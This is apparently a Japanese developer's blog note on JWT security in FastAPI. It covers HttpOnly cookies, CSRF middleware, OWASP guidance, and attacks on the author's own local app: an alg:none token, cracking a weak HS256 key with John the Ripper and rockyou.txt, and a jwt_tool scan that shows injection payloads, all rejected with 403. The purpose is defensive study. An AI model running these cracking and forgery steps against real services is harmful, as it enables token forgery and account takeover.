Skip to content

JWT のセキュリティ

認証JWT(RS256/EdDSA) で JWT を扱ったけど、ここでは攻撃の観点も含めてセキュリティについて考えてみる。 JWT をどのように扱うと危険になるのかを知るために。

JWT の保管場所

サーバーが JWT を発行した後にクライアントはどこにもっておくといいのか、いろいろな議論があるみたいで。
Cookie として持っておいたほうがセキュアってされてることが多いかもしれない、あとバックエンド側で JWT を守る設定にできるので、フロントエンドとの責任を分ける意味でもいいかな。

Info

Defending APIs (by Colin Domoney, 2024) には、

The current recommendation for secure token storage is to use the HttpOnly tag on the cookie location to prevent theft.
— p.217

とあるので、 HttpOnly をつけて Cookie として持っておくのが推奨されてる。

FastAPI だと、 set_cookie を使えばいい。
ただ、 JWT を Cookie に入れるようにすると、Swagger UI の Authorize ボタンが使えなくなる・・・その不便になった分セキュアになったって考えるしかないかな。

Cookie に持っておくなら、 CSRF の対策は必須。

Note

そもそも CSRF とはっていう部分は、 IPA安全なWebサイトの作り方 改訂第7版 を参照。

FastAPI では CSRF 対策ミドルウェアとして、 Starlette CSRF Middleware が使える。

  • インストール 

    uv add starlette-csrf

  • コード例 

    # main.py
from fastapi import FastAPI
from starlette_csrf.middleware import CSRFMiddleware

app = FastAPI()

app.add_middleware(
    CSRFMiddleware,
    secret="my_secret",
    cookie_samesite="strict",
    cookie_httponly=False, # フロントエンドのJavaScriptが読み取れるように
    cookie_secure=True,
)

@app.get("/")
async def read_root():
    return {"Hello": "World"}

このミドルウェアを有効にしてリクエストを送ると、ブラウザの Cookie に csrftoken がセットされる。
add_middleware で指定した内容がそのまま反映されてるのが確認できる。

Starlette CSRF Middleware を有効にすると csrftoken が Cookie にセットされる様子

OWASP Cross-Site Request Forgery Prevention Cheat Sheet

CSRF 対策の基準として、OWASP の Cross-Site Request Forgery Prevention Cheat Sheet がかなり有益。

Introduction

  • While Cross-Site Scripting (XSS) vulnerabilities can bypass CSRF protections, CSRF tokens are still essential for web applications that rely on cookies for authentication.
  • First, check if your framework has built-in CSRF protection and use it
  • If an API-driven site can't use <form> tags, consider using custom request headers

  • Implement at least one mitigation from Defense in Depth Mitigations section

    Note

    • XSS の脆弱性があると CSRF 対策をバイパスされてしまうけど、 CSRF トークンは Cookie 認証を使ってる Web アプリケーションではまだ不可欠
    • まずは、自分が使ってるフレームワークが CSRF 対策をビルトインしてるか確認を
    • <form> タグを使えない API-driven サイトの場合、カスタムリクエストヘッダーを使うことを検討する
    • Defense in Depth Mitigations セクションにある対策を少なくとも 1 つはやっておく

Token-Based Mitigation

  • The synchronizer token pattern is one of the most popular and recommended methods to mitigate CSRF.

    Note

    サーバーがトークンを保持して照合する方法は CSRF 対策として最もポピュラーで推奨される手法の 1 つ

Synchronizer Token Pattern

  • CSRF tokens should be generated on the server-side and they should be generated only once per user session or each request.
  • CSRF tokens should be: Unique per user session, Secret, Unpredictable
  • CSRF tokens prevent CSRF because without a CSRF token, an attacker cannot create valid requests to the backend server.

  • Since requests with custom headers are automatically subject to the same-origin policy, it is more secure to insert the CSRF token in a custom HTTP request header via JavaScript than adding a CSRF token in the hidden field form parameter.

    Note

    • トークンはセッションまたはリクエストごとに 1 回だけサーバーで生成する
    • CSRF トークンは、ユニークなものでシークレットとして扱われて、予測不可能なものにするべき
    • CSRF トークンがないと攻撃者は有効なリクエストをサーバーに送信できない
    • カスタムヘッダーを持つリクエストは同一オリジンポリシーの対象になるので、 hidden パラメーターよりもカスタムヘッダーで渡す方がセキュア

Starlette CSRF Middleware はこの Double Submit Cookie を使う; Cookie の csrftoken と Header の x-csrftoken を照合する

  • If maintaining the state for CSRF token on the server is problematic, you can use an alternative technique known as the Double Submit Cookie pattern. This technique is easy to implement and is stateless.
  • The most secure implementation of the Double Submit Cookie pattern is the Signed Double-Submit Cookie, which explicitly ties tokens to the user's authenticated session (e.g., session ID).
  • To generate HMAC CSRF tokens (with a session-dependent user value), the system must have:
    • A session-dependent value that changes with each login session.
    • A secret cryptographic key
    • A random value for anti-collision purposes

  • It's a common misconception to include timestamps as a value to specify the CSRF token expiration time. A CSRF Token is not an access token. They are used to verify the authenticity of requests throughout a session, using session information. A new session should generate a new token (1).

    Note

    • サーバーで CSRF トークンの状態管理が難しい場合、 Double Submit Cookie (実装が簡単でステートレス)が使える
    • 最もセキュアな実装は Signed Double-Submit Cookie で、トークンをユーザーの認証済みセッションに明示的に紐づける; Starlette CSRF Middleware ではこれは使えないっぽい
    • HMAC CSRF トークンを生成するにはセッション依存の値・秘密の暗号鍵・衝突防止用のランダム値が必要
    • CSRF トークンにタイムスタンプを入れて有効期限を持たせるのはよくある誤解、 CSRF トークンはアクセストークンじゃないので、セッションが変わったら新しいトークンを発行すれば OK

Employing Custom Request Headers for AJAX/API

Starlette CSRF Middleware はコレを使う前提; フロントエンドが Header に x-csrftoken として CSRF トークンを載せる

  • A user-friendly defense that is particularly well suited for AJAX or API endpoints is the use of a custom request header.

    Note

    カスタムリクエストヘッダーの使用は、 AJAX とか API エンドポイントに特に適した防御策

Defense In Depth Techniques

  • This attribute helps the browser decide whether to send cookies along with cross-site requests.
  • The Strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link.
  • If a website wants to maintain a user's logged-in session after the user arrives from an external link, SameSite's default Lax value provides a reasonable balance between security and usability.

  • This attribute should not replace a CSRF Token. Instead, it should co-exist with that token to protect the user in a more robust way.

    Note

    • SameSite 属性はブラウザがクロスサイトリクエストで Cookie を送信するかどうかを判断するのに役立つ
    • Strict を設定すると、通常のリンクをたどる場合も含めて、クロスサイトのあらゆる状況でブラウザが Cookie を送信しなくなる
    • 外部リンクからのユーザーのログイン状態を維持したい場合、デフォルトの Lax がセキュリティと使いやすさのバランスがいい
    • このアトリビュートは CSRF トークンの代わりにはならない。 CSRF トークンと共存させることで、より強固にユーザーを守れる

"alg: none" 攻撃

JWT を検証(decode)するときに、JWT のヘッダーに書いてある alg をそのまま使って検証しようとするのは良くない。
攻撃者視点だと、 alg: none(署名なし)の JWT を作って検証が通るようにできれば、 admin: true のような中身を入れて管理者権限を奪えるかもしれない。

Note

PyJWT を使っていればこの攻撃はほぼ成立しないのでは(下のダメなコードでも、実行するとエラーになる)。

alg: none の JWT は https://www.jwt.io/ で誰でも作れる。

# ⚠️ 攻撃の隙を与えるダメなコード例。 JWT ヘッダーの `alg` を取り出して、それを検証に使ってしまっている。
import jwt  # PyJWT

jwt_token = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImV4cCI6OTk5OTk5OTk5OSwiYWRtaW4iOnRydWV9."

header = jwt.get_unverified_header(jwt_token)  # ヘッダーから alg を取り出す
algorithm = header["alg"]                       # "none" が入る
payload = jwt.decode(jwt_token, algorithms=algorithm)

print("payload:", payload)

実行すると、 PyJWT が守ってくれるので例外になる。 

jwt.exceptions.InvalidSignatureError: Signature verification failed

改善するには、 alg をヘッダーから取らず、検証する側が使うアルゴリズムを指定して decode する。 

payload = jwt.decode(jwt_token, "my_secret", algorithms=["HS256"])

HS256 のオフライン辞書攻撃

HS256 のような共通鍵方式は、 hashcatJohn the Ripper でオフライン辞書攻撃ができる。

Warning

HTTPS にしておけば JWT が盗まれることはない、と考えても大丈夫かもしれないけど、悪意を持った人が自分でユーザーアカウントを作って手に入れた JWT を解析したら、鍵を割り出して好きなだけ偽造した JWT を作れるようになる。

例として、あえて不適切な鍵( my_secret )で署名した JWT を使う。 

import jwt  # PyJWT
from datetime import datetime, timedelta, timezone

expire = datetime.now(timezone.utc) + timedelta(minutes=10)
to_encode = {"exp": expire, "sub": "alice"}
jwt_token = jwt.encode(to_encode, "my_secret", algorithm="HS256")

print(jwt_token)

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NzIwNjQ5NzgsInN1YiI6ImFsaWNlIn0.t49It3EFK8RL8PJfvjBC1mu51Q6-yIq9s23CrfHMawE

JWT 自体は暗号化されているものではないので、署名アルゴリズムは https://www.jwt.io/ などで簡単に調べられる。この JWT をテキストファイルに保存しておく。 

$ cat jwt.txt
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NzIwNjQ5NzgsInN1YiI6ImFsaWNlIn0.t49It3EFK8RL8PJfvjBC1mu51Q6-yIq9s23CrfHMawE

John the Ripper の Jumbo 版をインストールして、 rockyou.txt(流出パスワードの辞書)を用意する。 

$ sudo snap install john-the-ripper
$ john --test
$ wget https://weakpass.com/download/90/rockyou.txt.gz
$ gunzip rockyou.txt.gz

オフライン辞書攻撃を実行すると、鍵が一瞬で割れる。 

$ john --format=HMAC-SHA256 --wordlist=rockyou.txt jwt.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
my_secret        (?)
1g 0:00:00:00 DONE (2026-02-23 12:27) 5.263g/s 4484Kp/s 4484Kc/s 4484KC/s natnatmissy..momo5390
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

john --list=formats コマンドを実行すると、 HMAC-SHA256 など JWT 関連を含む多数のアルゴリズムに対応していることがわかる。

john --list=formats の出力 
$ john --list=formats
descrypt, bsdicrypt, md5crypt, md5crypt-long, bcrypt, scrypt, LM, AFS,
tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256,
aix-ssha512, andOTP, ansible, Argon2, armory, as400-des, as400-ssha1,
asa-md5, AxCrypt, AzureAD, BestCrypt, BestCryptVE4, bfegg, Bitcoin,
BitLocker, bitshares, Bitwarden, BKS, Blackberry-ES10, WoWSRP, Blockchain,
cardano, chap, Clipperz, cloudkeychain, dynamic_n, cq, CRC32, cryptoSafe,
sha1crypt, sha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane,
diskcryptor, Django, django-scrypt, dmd5, dmg, dominosec, dominosec8,
DPAPImk, dragonfly3-32, dragonfly3-64, dragonfly4-32, dragonfly4-64, Drupal7,
eCryptfs, eigrp, electrum, ENCDataVault-MD5, ENCDataVault-PBKDF2, EncFS,
enpass, EPI, EPiServer, ethereum, fde, Fortigate256, Fortigate, FormSpring,
FVDE, geli, gost, streebog256crypt, streebog512crypt, gost94crypt, gpg,
HAVAL-128-4, HAVAL-256-3, hdaa, hMailServer, hsrp, IKE, ipb2, itunes-backup,
iwork, KeePass, keplr, keychain, keyring, keystore, known_hosts, krb4, krb5,
krb5asrep, krb5pa-sha1, krb5pa-md5, krb5tgs, krb5tgs-sha1, krb5-17, krb5-18,
krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS, MD2, mdc2,
MediaWiki, monero, money, MongoDB, scram, Mozilla, mscash, mscash2, MSCHAPv2,
mschapv2-naive, mssql, mssql05, mssql12, multibit, mysqlna, mysql-sha1,
mysql, net-ah, nethalflm, netlm, netlmv2, net-md5, netntlmv2, netntlm,
netntlm-naive, net-sha1, nk, notes, md5ns, nsec3, NT, NT-long, o10glogon,
o3logon, o5logon, ODF, Office, oldoffice, OpenBSD-SoftRAID, openssl-enc,
oracle, oracle11, Oracle12C, osc, ospf, Padlock, Palshop, Panama,
PBKDF2-HMAC-MD4, PBKDF2-HMAC-MD5, PBKDF2-HMAC-SHA1, PBKDF2-HMAC-SHA256,
PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda, pgpwde, phpass, PHPS,
PHPS2, pix-md5, PKZIP, po, postgres, PST, PuTTY, pwsafe, qnx, RACF,
RACF-KDFAES, radius, RAdmin, RAKP, rar, RAR5, Raw-SHA512, Raw-Blake2,
Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1,
Raw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3,
Raw-SHA384, restic, ripemd-128, ripemd-160, rsvp, RVARY, Siemens-S7,
Salted-SHA1, SSHA512, sapb, sapg, saph, sappse, securezip, 7z, Signal, SIP,
skein-256, skein-512, skey, SL3, SM3, Snefru-128, Snefru-256, LastPass, SNMP,
solarwinds, SSH, sspr, Stribog-256, Stribog-512, STRIP, SunMD5, SybaseASE,
Sybase-PROP, tacacs-plus, tcp-md5, telegram, tezos, Tiger, timeroast,
tc_aes_xts, tc_ripemd160, tc_ripemd160boot, tc_sha512, tc_whirlpool, vdi,
OpenVMS, vmx, VNC, vtp, wbb3, whirlpool, whirlpool0, whirlpool1, wpapsk,
wpapsk-pmk, xmpp-scram, xsha, xsha512, zed, ZIP, ZipMonster, plaintext,
has-160, HMAC-MD5, HMAC-SHA1, HMAC-SHA224, HMAC-SHA256, HMAC-SHA384,
HMAC-SHA512, AndroidBackup-opencl, agilekeychain-opencl, ansible-opencl,
argon2-opencl, axcrypt-opencl, axcrypt2-opencl, Bitcoin-opencl,
BitLocker-opencl, bitwarden-opencl, blockchain-opencl, cloudkeychain-opencl,
bcrypt-opencl, descrypt-opencl, gost94crypt-opencl, md5crypt-opencl,
cryptosafe-opencl, sha1crypt-opencl, sha256crypt-opencl, sha512crypt-opencl,
streebog256crypt-opencl, streebog512crypt-opencl, dashlane-opencl,
diskcryptor-opencl, diskcryptor-aes-opencl, dmg-opencl,
electrum-modern-opencl, EncFS-opencl, enpass-opencl, ethereum-opencl,
ethereum-presale-opencl, FVDE-opencl, geli-opencl, gpg-opencl, iwork-opencl,
KeePass-opencl, KeePass-Argon2-opencl, keychain-opencl, keyring-opencl,
keystore-opencl, krb5pa-md5-opencl, krb5pa-sha1-opencl, krb5tgs-opencl,
krb5asrep-aes-opencl, krb5tgs-sha1-opencl, lp-opencl, lpcli-opencl,
LM-opencl, lotus5-opencl, mscash-opencl, mscash2-opencl, mysql-sha1-opencl,
notes-opencl, NT-opencl, ntlmv2-opencl, NT-long-opencl, o5logon-opencl,
ODF-opencl, office-opencl, oldoffice-opencl, OpenBSD-SoftRAID-opencl,
PBKDF2-HMAC-MD4-opencl, PBKDF2-HMAC-MD5-opencl, PBKDF2-HMAC-SHA1-opencl,
PBKDF2-HMAC-SHA256-opencl, PBKDF2-HMAC-SHA512-opencl, pdf-opencl, pem-opencl,
pfx-opencl, pgpdisk-opencl, pgpsda-opencl, pgpwde-opencl, phpass-opencl,
pwsafe-opencl, RAKP-opencl, rar-opencl, RAR5-opencl, raw-MD4-opencl,
raw-MD5-opencl, raw-SHA1-opencl, raw-SHA256-opencl, raw-SHA512-free-opencl,
raw-SHA512-opencl, salted-SHA1-opencl, sappse-opencl, 7z-opencl, SL3-opencl,
solarwinds-opencl, ssh-opencl, sspr-opencl, strip-opencl, telegram-opencl,
tezos-opencl, timeroast-opencl, TrueCrypt-opencl, vmx-opencl, wpapsk-opencl,
wpapsk-pmk-opencl, XSHA512-free-opencl, XSHA512-opencl, zed-opencl,
ZIP-opencl, dummy, crypt
531 formats (151 dynamic formats shown as just "dynamic_n" here)

Info

オフライン辞書攻撃ができるので、 HS256 を使うなら鍵は必ず十分長くて推測されないものにするべき( openssl rand -hex 32 などで生成)。
根本的に対策するなら、秘密鍵で署名・公開鍵で検証する RS256 / EdDSA にするのがいい。

jwt_tool

jwt_tool は、 JWT の解析や各種攻撃を自動で試す診断ができるツール。

インストール

リポジトリを clone して、仮想環境に依存をインストールする。 

% git clone https://github.com/ticarpi/jwt_tool.git
% cd jwt_tool
% uv venv
% uv pip install -r requirements.txt
% uv run python jwt_tool.py

初回実行時に設定ファイル( jwtconf.ini )が作られる。

JWT の解析

JWT を引数に渡すと、ヘッダー・ペイロードをデコードして見せてくれる。 

% python jwt_tool.py eyJhbGciOiJFZERTQS...(省略)

Token header values:
[+] alg = "EdDSA"
[+] typ = "JWT"

Token payload values:
[+] exp = 1773727756    ==> TIMESTAMP = 2026-03-17 15:09:16 (UTC)
[+] sub = "71199a58-60e1-46e8-b7c1-a2acb1c03e45"
[+] scope = "login_access"

セキュリティテスト

localhost:8000 で FastAPI アプリを起動しておけば、 JWT を使ったテストができる。
/api/v1/users/me は認証が必要な API で、正しい JWT が Cookie にあれば自身の情報を取得できる。 -M at(all tests)でスキャンする。正規の EdDSA で署名された JWT に対しては、 alg:none・署名偽造・鍵混同・kid インジェクションなど、どの攻撃も 403(拒否)で弾けている。

jwt_tool のスキャン結果 
% python jwt_tool.py -M at -t http://localhost:8000/api/v1/users/me -rc "access_token=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NzM3Mjc3NTYsInN1YiI6IjcxMTk5YTU4LTYwZTEtNDZlOC1iN2MxLWEyYWNiMWMwM2U0NSIsInNjb3BlIjoibG9naW5fYWNjZXNzIn0.m4mvayCjhYoi8gX9iBK2GSzTZMtv0XKWGdx5RS1Q89TmzEQuqVVs4nNHlqcQCTdaUy2nOaVrhsLFd_0_l-pfAg" -np

        \   \        \         \          \                    \ 
   \__   |   |  \     |\__    __| \__    __|                    |
         |   |   \    |      |          |       \         \     |
         |        \   |      |          |    __  \     __  \    |
  \      |      _     |      |          |   |     |   |     |   |
   |     |     / \    |      |          |   |     |   |     |   |
\        |    /   \   |      |          |\        |\        |   |
 \______/ \__/     \__|   \__|      \__| \______/  \______/ \__|
 Version 2.3.0                \______|             @ticarpi      

/Users/alice/.jwt_tool/jwtconf.ini
Original JWT: eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NzM3Mjc3NTYsInN1YiI6IjcxMTk5YTU4LTYwZTEtNDZlOC1iN2MxLWEyYWNiMWMwM2U0NSIsInNjb3BlIjoibG9naW5fYWNjZXNzIn0.m4mvayCjhYoi8gX9iBK2GSzTZMtv0XKWGdx5RS1Q89TmzEQuqVVs4nNHlqcQCTdaUy2nOaVrhsLFd_0_l-pfAg

=====================
Decoded Token Values:
=====================

Token header values:
[+] alg = "EdDSA"
[+] typ = "JWT"

Token payload values:
[+] exp = 1773727756    ==> TIMESTAMP = 2026-03-17 15:09:16 (UTC)
[+] sub = "71199a58-60e1-46e8-b7c1-a2acb1c03e45"
[+] scope = "login_access"

----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------

[+] Sending token
jwttool_1ceb891ce18665d791c28f1df6bf9a4a Sending token Response Code: 403, 43 bytes
Running Scanning Module:
Running prescan checks...
jwttool_1ceb891ce18665d791c28f1df6bf9a4a Prescan: original token Response Code: 403, 43 bytes
jwttool_4a206a6288377b6a08cd288545606893 Prescan: no token Response Code: 403, 43 bytes
Valid and missing token requests return the same Status Code.
You should probably specify something from the page that identifies the user is logged-in (e.g. -cv "Welcome back, ticarpi!")
Do you wish to continue anyway? ("Y" or "N")y
jwttool_96f504bd89321193b6e785ed4dd84c0f Prescan: Broken signature Response Code: 403, 43 bytes
jwttool_3e9e8bf63c88bbc38d3a3892beb1891c Prescan: repeat original token Response Code: 403, 43 bytes

LAUNCHING SCAN: JWT Attack Playbook
jwttool_96f504bd89321193b6e785ed4dd84c0f Broken signature Response Code: 403, 43 bytes
jwttool_3e9e8bf63c88bbc38d3a3892beb1891c Persistence check 1 (should always be valid) Response Code: 403, 43 bytes
jwttool_be93fdc2a7d594417aa7f758093dde7d Claim processing check in exp claim Response Code: 403, 43 bytes
jwttool_3588aa0d549e35ba5d0b5a25edb4a12e Claim processing check in sub claim Response Code: 403, 43 bytes
jwttool_248d295c48e885c1dba233dc29a0ffdb Claim processing check in scope claim Response Code: 403, 43 bytes
jwttool_3e9e8bf63c88bbc38d3a3892beb1891c Persistence check 2 (should always be valid) Response Code: 403, 43 bytes
jwttool_1be5fdc7a6a9470be0697fa77b5ff5d2 Exploit: Blank password accepted in signature (-X b) Response Code: 403, 43 bytes
jwttool_80a5d15bb850ad5772e7f9889b8895ca Exploit: 'Psychic Signature' accepted in ECDSA signing (-X p) Response Code: 403, 43 bytes
jwttool_c204f8dbfe9d452c5f718e9a3a0e737d Exploit: Null signature (-X n) Response Code: 403, 43 bytes
jwttool_a7276b7da8f7d0c53580afa0ae8de840 Exploit: "alg":"none" (-X a) Response Code: 403, 43 bytes
jwttool_606e54d003531aec91b54cdb63c8acfe Exploit: "alg":"None" (-X a) Response Code: 403, 43 bytes
jwttool_5fc221a2d16909c0745cb9d1bfb8ca90 Exploit: "alg":"NONE" (-X a) Response Code: 403, 43 bytes
jwttool_bb4a8f97634e1568300e34656250cfad Exploit: "alg":"nOnE" (-X a) Response Code: 403, 43 bytes
File loaded: /Users/alice/.jwt_tool/jwttool_custom_public_RSA.pem
jwttool_72e8b0b4cd0027c8eeab50d664d8e088 Exploit: RSA Key Confusion Exploit (provided Public Key) Response Code: 403, 43 bytes
key: /Users/alice/.jwt_tool/jwttool_custom_private_RSA.pem
jwttool_05dade575c3d4e276a48f9e641bb286a Exploit: Injected JWKS (-X i) Response Code: 403, 43 bytes
jwttool_c0ac3d0c7e7ecb9797b7f46c3a0cce5c Exploit: Spoof JWKS (-X s) Response Code: 403, 43 bytes
jwttool_1ee7a3ff9eac6878389134e4e017bd4d Injected kid claim - null-signed with blank kid Response Code: 403, 43 bytes
jwttool_aecd76251e4f67f2a88d4b755802134a Injected kid claim - null-signed with kid="[path traversal]/dev/null" Response Code: 403, 43 bytes
jwttool_d2c1759684c82c3874fdefe86a41e946 Injected kid claim - null-signed with kid="/dev/null" Response Code: 403, 43 bytes
jwttool_8eccdf1b77f581bd5eaaf017684f8337 Injected kid claim - null-signed with kid="/invalid_path" Response Code: 403, 43 bytes
jwttool_9866c2b1c0c34242f2e464fc007324d7 Injected kid claim - RCE attempt - SLEEP 10 (did this request pause?) Response Code: 403, 43 bytes
jwttool_6397584c87455d3d73a9d43d2e06ae9b Injected kid claim - signed with secret = '1' from SQLi Response Code: 403, 43 bytes
External service interactions not tested - enter listener URL into 'jwtconf.ini' to try this option
Scanning mode completed: review the above results.

The following additional checks should be performed that are better tested manually:
[+] Try hunting for a Public Key for this token. Validate any JWKS you find (-V -jw [jwks_file]) and then use the generated Public Key file with the Playbook Scan (-pk [kid_from_jwks].pem)
Common locations for Public Keys are either the web application's SSL key, or stored as a JWKS file in one of these locations:
/oauth2/v1/keys
/jwks.json
/.well-known/jwks.json
/.well-known/jwks_uri
/.well-known/openid-configuration/jwks
/openid/connect/jwks.json
[+] Try waiting for the token to expire ("exp" value set to: 2026-03-17 15:09:16 (UTC))
Check if still working once expired.

LAUNCHING SCAN: Forced Errors
jwttool_c8722c029a00c6576b5b519b32e8c9f4 Injected None into Header Claim: alg Response Code: 403, 43 bytes
jwttool_412435dc5788bcdb52da9c20c48ec053 Injected None into Header Claim: typ Response Code: 403, 43 bytes
jwttool_1c3f145050952c2727980655e47ec229 Injected True into Header Claim: alg Response Code: 403, 43 bytes
jwttool_56b7bacab86ff37ece3b485c410875eb Injected True into Header Claim: typ Response Code: 403, 43 bytes
jwttool_09d72935b7c4917c74e95f8fd7684775 Injected False into Header Claim: alg Response Code: 403, 43 bytes
jwttool_912e9d8d534ade0ac3313c7c0455992a Injected False into Header Claim: typ Response Code: 403, 43 bytes
jwttool_1e705dae1df9a4d737cfad41dd30f696 Injected jwt_tool into Header Claim: alg Response Code: 403, 43 bytes
jwttool_a77df295f4ac29d6cdc4d58308345c21 Injected jwt_tool into Header Claim: typ Response Code: 403, 43 bytes
jwttool_08b0963b96186a5cdd7ebd00b14d07e1 Injected 0 into Header Claim: alg Response Code: 403, 43 bytes
jwttool_00568ae8e176a3f43b640de3428d2c08 Injected 0 into Header Claim: typ Response Code: 403, 43 bytes
jwttool_59bb508ddcd0ab68df5f1f8660ca816c Injected None into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_37ca3570ecf6626329c2a521ec839b36 Injected None into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_982335f3fbc555a4aaa23dcceee8a792 Injected None into Payload Claim: scope Response Code: 403, 43 bytes
jwttool_c9fa8fbefc40ee5de3730e55093a4e35 Injected True into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_10b0b8f70f9533c3970fae198ccfdab3 Injected True into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_19ae07744acea1ca5fe566a5f3902f05 Injected True into Payload Claim: scope Response Code: 403, 43 bytes
jwttool_9a6324554f4b01755336dab443f554aa Injected False into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_d86cb65968aa54ac06731db8a53562a0 Injected False into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_1a1c1c01a5237bc345cb329c351ad121 Injected False into Payload Claim: scope Response Code: 403, 43 bytes
jwttool_73e79dcdc0adfd42bffc5bac86efe7a5 Injected jwt_tool into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_b72e3861414807826664f9d81e9a5f9e Injected jwt_tool into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_7f2d3a172e47cf5ff33f3efab5ac98d1 Injected jwt_tool into Payload Claim: scope Response Code: 403, 43 bytes
jwttool_959fc1c017a9ce2f18a1ba6d58be7ee2 Injected 0 into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_bde66c640e056d6288c5ebefb2c5e7b1 Injected 0 into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_81b40e210f5e98b118a96f4a90e4a166 Injected 0 into Payload Claim: scope Response Code: 403, 43 bytes
Scanning mode completed: review the above results.


LAUNCHING SCAN: Common Claim Injection
jwttool_9f5e1767916ed58698445495611c6884 Injected /inject_common_typ into Header Claim: typ Response Code: 403, 43 bytes
jwttool_7b8e3d3642bca70ee65f37ac21b81475 Injected /inject_common_jku into Header Claim: jku Response Code: 403, 43 bytes
jwttool_a44ef85b92cb404919c966c314f134ba Injected /inject_common_kid into Header Claim: kid Response Code: 403, 43 bytes
jwttool_f22f2fe84af673fd292e82b590a5812d Injected /inject_common_x5u into Header Claim: x5u Response Code: 403, 43 bytes
jwttool_7904b1cc884991a5c67bb2989ae2f94a Injected /inject_common_x5t into Header Claim: x5t Response Code: 403, 43 bytes
jwttool_45fd68c48a190de4dcfd90a47c94250c Injected /inject_common_iss into Payload Claim: iss Response Code: 403, 43 bytes
jwttool_50cadf2707ba8add9168f8e1b82ac182 Injected /inject_common_sub into Payload Claim: sub Response Code: 403, 43 bytes
jwttool_3d63dedf585f020c86b1910502889e91 Injected /inject_common_aud into Payload Claim: aud Response Code: 403, 43 bytes
jwttool_7839e6e74da3315057921c847cda99ec Injected /inject_common_exp into Payload Claim: exp Response Code: 403, 43 bytes
jwttool_041398eb1dd032b41a1c29af55357200 Injected /inject_common_nbf into Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_071fcf906386fd67eec1594a09dfdf1c Injected /inject_common_iat into Payload Claim: iat Response Code: 403, 43 bytes
jwttool_f36e4645e970e1d64a731382c20887c1 Injected /inject_common_jti into Payload Claim: jti Response Code: 403, 43 bytes
jwttool_affd2d60767f99cdeb8e857863b77662 Injected /inject_common_name into Payload Claim: name Response Code: 403, 43 bytes
jwttool_b6d4b8befef00c54b95cfc7c752e9a05 Injected /inject_common_given_name into Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_02234cba2a495f1a7f36975ead61ff8f Injected /inject_common_family_name into Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_eb75a4e88b51ce5d0eaedb7f4579af11 Injected /inject_common_middle_name into Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_f1a669d2961f09ae3abb4f89559a4b10 Injected /inject_common_nickname into Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_5be4c968078e85ea04af8b2c77fe6ae2 Injected /inject_common_preferred_username into Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_a8182e2e4900faeeb83adc36f7434621 Injected /inject_common_profile into Payload Claim: profile Response Code: 403, 43 bytes
jwttool_ea21f8678587a63389e8c03f31dd50d7 Injected /inject_common_picture into Payload Claim: picture Response Code: 403, 43 bytes
jwttool_f42c5c6d4ee6c32d053c29e0894dc00d Injected /inject_common_website into Payload Claim: website Response Code: 403, 43 bytes
jwttool_bc1ccf94145df918981ec80d104a1c75 Injected /inject_common_email into Payload Claim: email Response Code: 403, 43 bytes
jwttool_f7964117a97729957818bfba35fd2c0c Injected /inject_common_email_verified into Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_c50a9a100b4e2d13749acaa7f5c27731 Injected /inject_common_gender into Payload Claim: gender Response Code: 403, 43 bytes
jwttool_8dfdea11cdf58dab5bb7929fd5b36bfd Injected /inject_common_birthdate into Payload Claim: birthdate Response Code: 403, 43 bytes
jwttool_79fcb489b4c850f7ef65103e45912c43 Injected /inject_common_zoneinfo into Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_e9e590e98a458b17c6891168e71592f6 Injected /inject_common_locale into Payload Claim: locale Response Code: 403, 43 bytes
jwttool_0a963ef701015e8815f753a401926950 Injected /inject_common_phone_number into Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_a4e015eb18bbf89d03947dc876f376d9 Injected /inject_common_phone_number_verified into Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_d9ee2f6ef215caf63f2e571eaf9971af Injected /inject_common_address into Payload Claim: address Response Code: 403, 43 bytes
jwttool_2b1db24e50559af2a1d4dfe164493152 Injected /inject_common_updated_at into Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_2bf70dbc8addcbea3b26cd5dedba456d Injected /inject_common_azp into Payload Claim: azp Response Code: 403, 43 bytes
jwttool_2fc87cb376368437b0f637adcfc1ced4 Injected /inject_common_nonce into Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_925f40aa5b916c13cc127c59aab9f54d Injected /inject_common_auth_time into Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_93b88bb1717b55cbcdbcb799d8c1664e Injected /inject_common_at_hash into Payload Claim: at_hash Response Code: 403, 43 bytes
